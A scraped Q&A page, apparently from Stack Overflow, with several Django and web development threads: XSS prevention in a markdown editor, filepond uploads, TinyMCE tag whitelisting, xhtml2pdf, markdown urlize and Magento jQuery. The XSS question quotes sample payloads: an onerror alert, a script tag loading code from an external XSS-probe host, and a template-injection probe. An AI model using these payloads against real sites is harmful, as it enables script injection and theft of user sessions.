How to prevent XSS attacks with HTML/Javascript? - django

I want to know that how can I prevent script code and HTML attributes to stop from execution in editor of my website?
If someone add script tags with external link of code or call a function of jQuery in some attribute of HTML tag.
I am using markdown editor and django framework.
For example:
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
'>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
{{7*7}}{7*7}

use htmlEscape="true" for all input fields.
If you are displaying a value, try fn:escapeXml(value). You need to import jstl functions taglib

Related

How to use filepond with Django

As the title suggest.
I have searched Google and stackoverflow, so far I don't find any tutorial that doesn't involve (https://github.com/ImperialCollegeLondon/django-drf-filepond).
While this library seems maintain, at 68 stars, too much risk and I prefer to do without it.
What I tried
When you use filepond input tag with class file-uploader file-uploader-grid, in browser, it will compile and generate a div tag.
The issue is that the id in input will be generated under the div instead of input tag.
Without that id, when the form is submitted, self.request.FILES will be empty dictionary.
So I tried writing a JavaScript to add id to input tag, which don't work unfortunately.
Anyone successfully do it in Django without additional library? Thanks
The input generated is only there to catch files, the actual data is either stored in hidden input fields (if you use server property) or encoded in those fields (if you use file encode plugin).
You can set storeAsFile to true to have FilePond update the fileList property of a file field. But that doesn't work on older versions of iOS, see link in property description:
https://pqina.nl/filepond/docs/api/instance/properties/

Django. How to make html(tinymce) input safe on form.clean?

For example, I have "Add comment" form on my django-powered website.
This form have text field with tinymce.
I want user to be able to use only p,strong,i,ul,ol,li tags. Because, result is html-code, I can't use strip_tags on my AddCommentForm.clean_text method. Also, I need to be sure, that result doesn't contain any vulnerabilities (js, iframe, etc)
I believe, that you can advice me a good solution for this))
This can be done at the TinyMCE side via some configuration parameters. While it's not 100% secure fro someone POSTing directly, it's better than nothing.
It should just be a matter of tweaking your valid_elements config in your TinyMCE setup to only allow what you want:
...
valid_elements : "p,strong/b,i/em,ul,ol,li",
...

In my Django application i want to print one reciept, for that i am fallowing xhtml2pdf

In my Django application i want to print one reciept, for that i am fallowing html to pdf convert then in pdf automatically print options is there.
for that i am install python-pisa module and i has fallowing code but my common css is not apply how is it work..
Not all CSS styles are supported by pisa, check out
http://xhtml2pdf.appspot.com/static/pisa-en.html
There are also custom layout definitions for pisa (same link), so if you want to generate it straight from django you should define a different template for this purpose.

Getting markdown and urlize template tags to play nice

I'm using markdown to format some comments in a Django app.
If I try to combine markdown and urlize, inevitably bad formatting errors happen (links get added where they don't belong or aren't recognized, and of course the errors change depending on which filter I use first).
Basically I'd like a filter that does markdown and automatically turns links into hyperlinks if not done so by markdown.
Otherwise, I suppose I'll have to roll my own filter, which I would so rather not do.
What I do is use the Markdown urlize extension.
Once installed, you can use it in a Django template like this:
{{ value|markdown:"urlize" }}
Or in Python code like this:
import markdown
md = markdown.Markdown(safe_mode=True, extensions=['urlize'])
converted_text = md.convert(text)
Here is the start of the Markdown extension docs in case you need more info.

Magento programmatically appending code to template pages

I am developing a Magento extension and would like to run some jQuery script in the footer of the html template.
I have manually edited page.xml layout file to load my jQuery source and manually edited the footer.phtml template file to test my code, but I now want to package it up into an extension. The question is how to do this within my extension configuration, to tell magento to load the new jQuery source library in the header, and to append code somewhere in the footer (or anywhere) in the magento generated theme html.
Create a custom Magento Module
Use this module to add a customer Package Layout Update XML File
Use this Package Layout Update XML files to add a javascript src link to a (CDN?) jQuery, and add a custom block to the before_body_end block
Use this custom block to output your needed Javascript code
Use Magento Connect System->Magento Connect->Package Extensions to package up your customer Magento Module file, as well as any other files on the system you used (phtml template, jQuery files if not using a CDN, etc) into an Extension.
Wouldn't it be easier to use a static block? This way the client or yourself could update the jQuery right in the admin area without going into code. You could also add logic with multiple blocks if you needed. You can display a static block in a template like so:
<?php echo $this->getChildHtml('staticblockname') ?>
Otherwise you might want to read this tutorial on creating a module (which you call an extension): http://magento4u.wordpress.com/2009/06/08/create-new-module-helloworld-in-magento/